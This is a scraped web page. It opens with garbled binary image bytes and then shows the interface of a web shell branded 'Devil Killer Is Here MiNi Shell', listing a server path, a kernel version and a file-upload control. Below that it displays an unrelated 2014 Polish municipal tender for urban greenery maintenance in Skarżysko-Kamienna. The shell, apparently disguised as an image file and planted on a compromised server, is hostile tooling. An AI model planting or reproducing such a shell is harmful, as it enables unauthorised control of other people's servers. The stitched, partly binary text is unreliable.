JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140416/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140416/131008-N-2014.html

<p class="kh_header"><b>Skarżysko-Kamienna: Utrzymanie zieleni na terenie miasta Skarżysko-Kamienna w roku 2014</b><br>
<b>Numer ogłoszenia: 131008 - 2014; data zamieszczenia: 16.04.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Miasto Skarżysko-Kamienna , ul. Sikorskiego 18, 26-110 Skarżysko-Kamienna, woj. świętokrzyskie, tel. 041 2520100, faks 041 2520200.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Utrzymanie zieleni na terenie miasta Skarżysko-Kamienna w roku 2014.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest : prowadzenie utrzymania i pielęgnacji  zieleni miejskiej w sześciu strefach, których zakres, lokalizację i powierzchnie ( m2 ) przeznaczone do letniego utrzymania określa wykaz terenów zieleni miejskiej dla każdej ze stref  ( zał. Nr 5/1; 5/2; 5/3; 5/4 , 5/5, 5/6  do SIWZ ) . Szczegółowy opis prac do wykonania w ramach przedmiotu zamówienia, jak również wykaz zakładanej częstotliwości ich wykonania zawarte są odpowiednio w zał. Nr 3 i zał. nr 4 do SIWZ. Warunki realizacji zamówienia określone zostały w istotnych dla stron postanowieniach, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego  stanowiących zał. Nr 8 do SIWZ.
Opis robót objętych ryczałtowym bieżącym utrzymaniem  Strefy VI opisuje                             zał.3-2 i 5/6, natomiast dla Strefy I - V : zał. Nr 3, 4 i odpowiednio 5/1 do 5/5.Rozliczenie prowadzone będzie w PLN.
Zakres robót oraz częstotliwość ich realizacji dostosowana będzie do posiadanych środków finansowych i warunków wegetacji roślin. 

Przedmiot zamówienia został podzielony na  sześć zadań tj.:
1. Zadanie Nr 1 Utrzymanie zieleni miejskiej w roku 2014 - Strefa I 
2. Zadanie Nr 2 Utrzymanie zieleni miejskiej w roku 2014 - Strefa II 
3. Zadanie Nr 3 Utrzymanie zieleni miejskiej w roku 2014 - Strefa III 
4. Zadanie Nr 4 Utrzymanie zieleni miejskiej w roku 2014 - Strefa IV
5. Zadanie Nr 5 Utrzymanie zieleni miejskiej w roku 2014 - Strefa V.
6. Zadanie Nr 6 Utrzymanie zieleni miejskiej w roku 2014 - Strefa VI.
Zamawiający dopuszcza złożenie ofert przez jednego Wykonawcę maksymalnie na dwa zadania.
Wykonawca ponosi skutki prawne za ewentualne szkody osób trzecich spowodowane wykonywaniem przedmiotu zamówienia.
2.	Na Wykonawcy ciążą wszystkie obowiązki wynikające z ustawy z dnia 14.12.2012  r. o odpadach ( Dz.U. z 2013 r. poz. 21 ze zm. );
        ustawy z dnia 13.09.1996 r. o utrzymaniu czystości i porządku w gminach                          (Dz.U. z 2012 r. , poz. 391 ze zm. ),          ustawy z dnia 27.04.2001 r. - Prawo ochrony środowiska (Dz.U. z  2008 r. Nr 25,                 poz. 150 ze zm. ),
         uchwały Rady Miasta Nr XXXI/102/2012 z dnia 29 listopada 2012 r.w sprawie uchwalenia Regulaminu utrzymania czystości i porządku na terenie Gminy                               Skarżysko - Kamienna.
Wspólny Słownik Zamówień (CPV); 
77211500-7 Usługi pielęgnacji drzew                                                                                                                              77313000-7 Usługi utrzymania parków                                                                                                     77310000-6 Usługi sadzenia roślin oraz utrzymanie terenów zielonych.;                                                77314100-5 Usługi w zakresie trawników;                                                                                              77342000-9 przycinanie żywopłotów;                                                                                                             77300000-3 usługi ogrodnicze.</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje możliwości  udzielenia zamówień uzupełniających, o których mowa     w art. 67 ust. 1 pkt 6 ustawy Prawo zamówień publicznych - 50 % wartości zamówienia podstawowego - polegających na powtórzeniu tego samego rodzaju zamówień .</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 77.21.15.00-7, 77.31.30.00-7, 77.31.00.00-6, 77.31.41.00-5, 77.34.20.00-9.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.11.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia warunku będzie dokonana na podstawie złożonego 				oświadczenia o spełnieniu warunku zgodnie ze wzorem - Załącznik nr 10</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>posiadają wiedzę i doświadczenie -  a zwłaszcza aby wykazali,że wykonali usługi , a w przypadku świadczeń okresowych lub ciągłych również wykonywanych głównych usług w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy -               w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów na rzecz których usługi zostały wkonane oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane nalezycie tj. 
dla Zadania   Nr 1
-  	co najmniej jednej usługi polegającej na utrzymaniu parków miejskich                  lub obejmującej w swym zakresie utrzymanie parku o wartości                       co najmniej 20.000,00 zł. brutto 
-	co najmniej trzy usługi polegające na utrzymaniu zieleni miejskiej              w okresie wegetacyjnym roślin oraz pielęgnacji nasadzeń roślin ozdobnych o wartości minimum   co najmniej 85.000,00 zł. brutto każda;
Za wykonaną usługę Zamawiający uzna taką usługę, którą Wykonawca wykonał w ramach jednej umowy i której przedmiot został odebrany przez Zamawiającego jako wykonany należycie 

dla Zadania   Nr 2, 3, 4 i 5
-  	co najmniej trzy usługi polegające na utrzymaniu zieleni miejskiej w okresie wegetacyjnym roślin o wartości minimum 35.000,00 zł. brutto każda.
Za wykonaną usługę Zamawiający uzna taką usługę, którą Wykonawca wykonał w ramach jednej umowy i której przedmiot został odebrany przez Zamawiającego jako wykonany należycie 


dla Zadania   Nr 6
-  	co najmniej dwie usługi polegające na utrzymaniu i pielęgnacji rabat                   lub gazonów kwiatowych o wartości minimum 85.000,00 zł. brutto każda.

Za wykonaną usługę Zamawiający uzna taką usługę, którą Wykonawca wykonał w ramach jednej umowy i której przedmiot został odebrany przez Zamawiającego jako wykonany należycie 
		Ocena spełnienia warunku będzie dokonana na podstawie złożonego 				wykazu prac /doświadczenie zawodowe / zgodnie ze wzorem                       			- Załącznik nr 6  do SIWZ ( odpowiednio do zadania  ) oraz dowodu dot. czy 		usługi  zostały wykonane lub są wykonywane należycie. 
	Dowodami, o których mowa powyżej są:
1) poświadczenie, z tym że w odniesieniu do nadal wykonywanych usług poświadczenie powinno być wydane nie wcześniej niż na 3 miesiące przed upływem terminu składania ofert;

2) oświadczenie wykonawcy - jeżeli z uzasadnionych przyczyn o obiektywnym charakterze wykonawca nie jest w stanie uzyskać poświadczenia, o którym mowa powyżej.
W przypadku gdy Zamawiający - jest podmiotem, na rzecz którego zostały wcześniej wykonane usługi wskazane w wykazie, wykonawca nie ma obowiązku przedkładania przedmiotowych dowodów.

Jeżeli w/w wykaz lub dowody, o których mowa powyżej będą budzić wątpliwości zamawiającego lub gdy z poświadczenia albo z innego dokumentu będzie wynikało, że zamówienie nie zostało wykonane lub zostało wykonane nienależycie, zamawiający zwróci się bezpośrednio do właściwego podmiotu, na rzecz którego usługi były lub miały być wykonane, o przedłożenie dodatkowych informacji lub dokumentów bezpośrednio zamawiającemu.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Dla Zadań : 1,2,3,4,5, i 6
	Potencjał techniczny: Zamawiający nie wyznacza szczegółowego warunku w tym zakresie .
			Ocena spełnienia warunku będzie dokonana na podstawie złożonego 				oświadczenia o spełnieniu warunku zgodnie ze wzorem - Załącznik nr 10</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>dla Zadania   Nr  1 i 6
a.	dysponują lub przedstawią  pisemne zobowiązanie innych podmiotów do udostępnienia osób zdolnych do wykonania zamówienia  tj.: wskażą:
-	 co najmniej jedną osobę, która  będzie  uczestniczyć w wykonywaniu zamówienia, odpowiedzialną za świadczone usługi  legitymującą się kierunkowym przygotowaniem zawodowym ogrodniczym co najmniej na poziomie średnim oraz posiadającą minimum 36 miesięczne                (3letnie) doświadczenie - zatrudnienie - przy utrzymaniu zieleni.  
dla Zadania   Nr  2,3,4 i 5
a.	dysponują lub przedstawią  pisemne zobowiązanie innych podmiotów do udostępnienia osób zdolnych do wykonania zamówienia  tj. Wskażą                   co najmniej dwie osoby, które  będą  uczestniczyć w wykonywaniu zamówienia
-	co najmniej jedna osoba  legitymująca się kierunkowym przygotowaniem zawodowym ogrodniczym,   co najmniej na poziomie średnim , 

				Ocena spełnienia warunku będzie dokonana na podstawie złożonego 				wykazu osób   zgodnie ze wzorem - Załącznik nr 7                        				(odpowiednio do zadania ) do SIWZ.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Dla Zadań : 1,2,3,4,5, i 6
Zamawiający nie wyznacza szczegółowego warunku w tym zakresie. Ocena spełnienia warunku będzie dokonana na podstawie złożonego 	oświadczenia o spełnieniu warunku zgodnie ze wzorem - Załącznik nr 10</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

</ul>

<p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>5. 	Inne dokumenty niezbędne do przeprowadzenia postępowania:
a)	pisemne zobowiązanie innych podmiotów, o których mowa w art. 26 ust. 2b Pzp, do oddania Wykonawcy do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonaniu zamówienia, w przypadku, gdy Wykonawca będzie polegał na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych, tych podmiotów. (wzór - zał. nr 9 )
 Wymagana forma dokumentu  - oryginał   
b)	pełnomocnictwo określające jego zakres w przypadku, gdy Wykonawcę reprezentuje pełnomocnik.
Wymagana forma dokumentu - oryginał lub kopia poświadczona przez notariusza
c)	pełnomocnictwo do reprezentowania w postępowaniu o udzielenie zamówienia publicznego albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego Wykonawców występujących wspólnie (w tym: konsorcja, spółki cywilne) w przypadku wspólnego ubiegania się o udzielenie niniejszego zamówienia.
Wymagana forma dokumentu - oryginał lub kopia poświadczona przez notariusza.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zadanie I-V
4.	Zamawiający zastrzega sobie możliwość dokonywania zmian ilościowych zamawianych usług  w zakresie poszczególnych rodzajów prac składających się na przedmiot zamówienia, przy zachowaniu ogólnej wartości umowy.
5.	Zakres robót oraz częstotliwość ich realizacji dostosowana będzie do posiadanych środków  finansowych, warunków wegetacji roślin, warunków pogodowych.
2.	Zmiana umowy jest możliwa, z zastrzeżeniem art.144 ustawy Prawo zamówień publicznych,                w niżej wymienionym zakresie:
a)	ceny brutto na wykonywane zamówienia publiczne jedynie w przypadku zmiany stawki podatku od towarów i usług,
b)	danych objętych fakturą, w szczególności NIP-u, adresu lub nr rachunku Wykonawcy                   w przypadku ich zmiany,
c)	osób odpowiedzialnych za prowadzenie usługi z ramienia każdej strony w przypadku wyznaczenia przez daną stronę innej osoby jako odpowiedzialną.
d)	Zamawiający dopuszcza zmianę ilości zlecanych usług w zależności od potrzeb wynikających z warunków wegetacji roślin, nietypowych warunków wegetacyjnych lub pogodowych, czasowym zajęciem części terenów przez innych użytkowników, zmniejszeniem zakresu koniecznych do wykonania prac., trwałym wyeliminowaniem pewnych elementów wyposażenia terenów zieleni, na wskutek wandalizmu bądź kradzieży,
e)	Zamawiający w przypadku zmiany warunków atmosferycznych powodujących, że wykonanie umowy staje się niemożliwe ( np. mróz, opady śniegu ) zastrzega sobie możliwość rezygnacji z części zamówienia lub rozwiązania umowy przed upływem okresu jej obowiązywania.
f)	Zamawiający zastrzega sobie możliwość rezygnacji z części zamówienia lub rozwiązania umowy przed upływem okresu jej obowiązywania z uwagi na sytuację finansową Zamawiającego,
g)	Zmiany dotyczące podwykonawcy: W przypadku nie wskazania w ofercie części zamówienia przewidzianej do powierzenia podwykonawcy, lub zmiany wskazanej w ofercie części przewidzianej do powierzenia podwykonawcy Zamawiający dopuszcza zmianę w tym zakresie pod warunkiem pisemnego poinformowania Zamawiającego przez Wykonawcę o zamiarze wprowadzenia zmian i po uzyskaniu zgody Zamawiającego na wprowadzenie tych zmian.                


Zadanie VI


7.	W przypadku zmiany warunków atmosferycznych powodujących, że wykonanie umowy staje się niemożliwe (np. mróz, opady śniegu) Zamawiający zastrzega sobie możliwość rezygnacji              z części zamówienia lub rozwiązania umowy przed upływem okresu jej obowiązywania -  skutkuje to aneksem do niniejszej umowy.
2.	Zmiana umowy jest możliwa, z zastrzeżeniem art.144 ustawy Prawo zamówień publicznych,                w niżej wymienionym zakresie:
a)	ceny brutto na wykonywane zamówienia publiczne jedynie w przypadku zmiany stawki podatku od towarów i usług,
b)	danych objętych fakturą, w szczególności NIP-u, adresu lub nr rachunku Wykonawcy                   w przypadku ich zmiany,
c)	osób odpowiedzialnych za prowadzenie usługi z ramienia każdej strony w przypadku wyznaczenia przez daną stronę innej osoby jako odpowiedzialną.
d)	Zamawiający w przypadku zmiany warunków atmosferycznych powodujących, że wykonanie umowy staje się niemożliwe ( np. mróz, opady śniegu ) zastrzega sobie możliwość rezygnacji z części zamówienia lub rozwiązania umowy przed upływem okresu jej obowiązywania.
e)	Zamawiający zastrzega sobie możliwość rezygnacji z części zamówienia lub rozwiązania umowy przed upływem okresu jej obowiązywania z uwagi na sytuację finansową Zamawiającego,
f)	Zmiany dotyczące podwykonawcy: W przypadku nie wskazania w ofercie części zamówienia przewidzianej do powierzenia podwykonawcy, lub zmiany wskazanej w ofercie części przewidzianej do powierzenia podwykonawcy Zamawiający dopuszcza zmianę w tym zakresie pod warunkiem pisemnego poinformowania Zamawiającego przez Wykonawcę o zamiarze wprowadzenia zmian i po uzyskaniu zgody Zamawiającego na wprowadzenie tych zmian.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.umskarzysko.bip.doc.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miasta
ul. Sikorskiego 18
26-110 Skarżysko-Kamienna
II piętro pok. 94.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 24.04.2014 godzina 12:00, miejsce: Urząd Miasta
ul. Sikorskiego 18
26-110 Skarżysko-Kamienna
Biuro Obsługi Interesanta parter pok. nr 13.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Zadanie Nr 1 Utrzymanie zieleni miejskiej w roku 2014 - Strefa I.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest : prowadzenie utrzymania i pielęgnacji  zieleni miejskiej w sześciu strefach, których zakres, lokalizację i powierzchnie ( m2 ) przeznaczone do letniego utrzymania określa wykaz terenów zieleni miejskiej dla każdej ze stref  ( zał. Nr 5/1; 5/2; 5/3; 5/4 , 5/5, 5/6  do SIWZ ) . Szczegółowy opis prac do wykonania w ramach przedmiotu zamówienia, jak również wykaz zakładanej częstotliwości ich wykonania zawarte są odpowiednio w zał. Nr 3 i zał. nr 4 do SIWZ. Warunki realizacji zamówienia określone zostały w istotnych dla stron postanowieniach, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego  stanowiących zał. Nr 8 do SIWZ.
Opis robót objętych ryczałtowym bieżącym utrzymaniem  Strefy VI opisuje                             zał.3-2 i 5/6, natomiast dla Strefy I - V : zał. Nr 3, 4 i odpowiednio 5/1 do 5/5.Rozliczenie prowadzone będzie w PLN.
Zakres robót oraz częstotliwość ich realizacji dostosowana będzie do posiadanych środków finansowych i warunków wegetacji roślin.
2.	Na Wykonawcy ciążą wszystkie obowiązki wynikające z: 
ustawy z dnia 14.12.2012  r. o odpadach ( Dz.U. z 2013 r. poz. 21 ze zm. );
 ustawy z dnia 13.09.1996 r. o utrzymaniu czystości i porządku w gminach                          (Dz.U. z 2012 r. , poz. 391 ze zm. ),
ustawy z dnia 27.04.2001 r. - Prawo ochrony środowiska (Dz.U. z  2008 r. Nr 25,                 poz. 150 ze zm. ),
       uchwały Rady Miasta Nr XXXI/102/2012 z dnia 29 listopada 2012 r.w sprawie uchwalenia Regulaminu utrzymania czystości i porządku na terenie Gminy                               Skarżysko - Kamienna.
 Wspólny Słownik Zamówień (CPV); 
77211500-7 Usługi pielęgnacji drzew                                                                                                                              77313000-7 Usługi utrzymania parków                                                                                                     77310000-6 Usługi sadzenia roślin oraz utrzymanie terenów zielonych.;                                                77314100-5 Usługi w zakresie trawników;                                                                                              77342000-9 przycinanie żywopłotów;                                                                                                             77300000-3 usługi ogrodnicze.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 77.21.15.00-7, 77.31.30.00-7, 77.31.00.00-6, 77.31.41.00-5, 77.34.20.00-9, 77.30.00.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Zadanie Nr 2 Utrzymanie zieleni miejskiej w roku 2014 - Strefa II.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest : prowadzenie utrzymania i pielęgnacji  zieleni miejskiej w sześciu strefach, których zakres, lokalizację i powierzchnie ( m2 ) przeznaczone do letniego utrzymania określa wykaz terenów zieleni miejskiej dla każdej ze stref  ( zał. Nr 5/1; 5/2; 5/3; 5/4 , 5/5, 5/6  do SIWZ ) . Szczegółowy opis prac do wykonania w ramach przedmiotu zamówienia, jak również wykaz zakładanej częstotliwości ich wykonania zawarte są odpowiednio w zał. Nr 3 i zał. nr 4 do SIWZ. Warunki realizacji zamówienia określone zostały w istotnych dla stron postanowieniach, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego  stanowiących zał. Nr 8 do SIWZ.
